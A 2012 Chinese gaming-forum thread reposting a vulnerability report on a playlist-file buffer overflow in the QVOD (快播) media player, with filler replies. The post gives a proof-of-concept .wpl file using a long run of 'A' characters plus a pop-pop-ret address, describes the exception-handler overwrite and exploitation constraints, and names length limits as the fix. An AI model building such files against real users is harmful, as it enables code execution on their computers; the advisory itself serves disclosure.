登录
|
中文注册
快捷导航
红茶市场
I P 状态
天泽排行
游戏注册
行为记录
二级密码
天泽下载
道具购买
主播招募
论坛
搜索
搜索
热搜:
天泽在线
透明世界
插件
僵尸
sma
amxx
源码
CS1.6
脚本
本版
帖子
用户
天泽在线_深圳CS俱乐部_CS对战平台_Cs1.6_amxx_sma插件_CS论坛
»
论坛
›
—≡娱乐休闲≡—
›
『电脑技术-资讯区』
›
快播播放器播放列表文件溢出
1
2
3
/ 3 页
下一页
返回列表
查看:
1889
|
回复:
25
快播播放器播放列表文件溢出
[复制链接]
admin
admin
当前离线
积分
143262
窥视卡
雷达卡
发表于 2012-12-13 02:10:47
|
显示全部楼层
|
阅读模式
处理播放列表文件之后,在某处再次引用文件名没有限制长度而导致溢出
版本:
<?wpl version="1.0"?>
<smil>
<head>
<meta name="Generator" content="Nothing is true"/>
<title>test</title>
</head>
<body>
<seq>
<media src="AAA......AAAACRAAAAAAAAAA.wma"/>
</seq>
</body>
</smil>
CR之前一共有1900个'A',CR是MultiByteToWideChar之后pop pop ret的地址,将上述代码保存为xxx.wpl
在处理wpl文件之后,在播放列表中显示
当鼠标滑过播放列表中的文件名时,将导致溢出
通过覆盖异常,可以跳转到
然后由于复制内容超出堆栈段的最大地址空间而导致异常,跳到
要想成功利用该漏洞,shellcode必须是可打印字符,然后还经过unicode转换之后还必须能使用,最后该堆栈段,还不能执行,ret2lib把。。。。
修复方案:
长度限制
快播播放器
,
播放列表
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
476682284
该用户已被删除
发表于 2012-12-15 04:50:30
|
显示全部楼层
提示:
作者被禁止或删除 内容自动屏蔽
回复
支持
反对
使用道具
举报
显身卡
nmqsx
nmqsx
当前离线
积分
168
窥视卡
雷达卡
发表于 2012-12-19 04:07:17
|
显示全部楼层
提示:
作者被禁止或删除 内容自动屏蔽
回复
支持
反对
使用道具
举报
显身卡
nmqsx
nmqsx
当前离线
积分
168
窥视卡
雷达卡
发表于 2012-12-21 22:41:01
|
显示全部楼层
提示:
作者被禁止或删除 内容自动屏蔽
回复
支持
反对
使用道具
举报
显身卡
福灿彩好
福灿彩好
当前离线
积分
188
窥视卡
雷达卡
发表于 2012-12-24 04:57:06
|
显示全部楼层
提示:
作者被禁止或删除 内容自动屏蔽
回复
支持
反对
使用道具
举报
显身卡
亲爹
亲爹
当前离线
积分
97
窥视卡
雷达卡
发表于 2014-11-17 03:07:28
|
显示全部楼层
提示:
作者被禁止或删除 内容自动屏蔽
回复
支持
反对
使用道具
举报
显身卡
神之旋律
神之旋律
当前离线
积分
38
窥视卡
雷达卡
发表于 2014-12-4 16:06:00
|
显示全部楼层
我有家的感觉~~你知道吗
回复
支持
反对
使用道具
举报
显身卡
去留无意
去留无意
当前离线
积分
1228
窥视卡
雷达卡
发表于 2014-12-27 18:36:14
|
显示全部楼层
知道了 不错~~~
回复
支持
反对
使用道具
举报
显身卡
关羽
关羽
当前离线
积分
53
窥视卡
雷达卡
发表于 2015-1-27 16:43:57
|
显示全部楼层
抢座位来了
回复
支持
反对
使用道具
举报
显身卡
王羽尧
王羽尧
当前离线
积分
68
窥视卡
雷达卡
发表于 2015-3-1 13:57:44
|
显示全部楼层
顶.支持,路过.....
回复
支持
反对
使用道具
举报
显身卡
下一页 »
1
2
3
/ 3 页
下一页
返回列表
高级模式
B
Color
Image
Link
Quote
Code
Smilies
本版积分规则
发表回复
回帖后跳转到最后一页
窥视卡
雷达卡
发表于 2012-12-13 02:10:47
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
发表于 2012-12-15 04:50:30
发表于 2012-12-19 04:07:17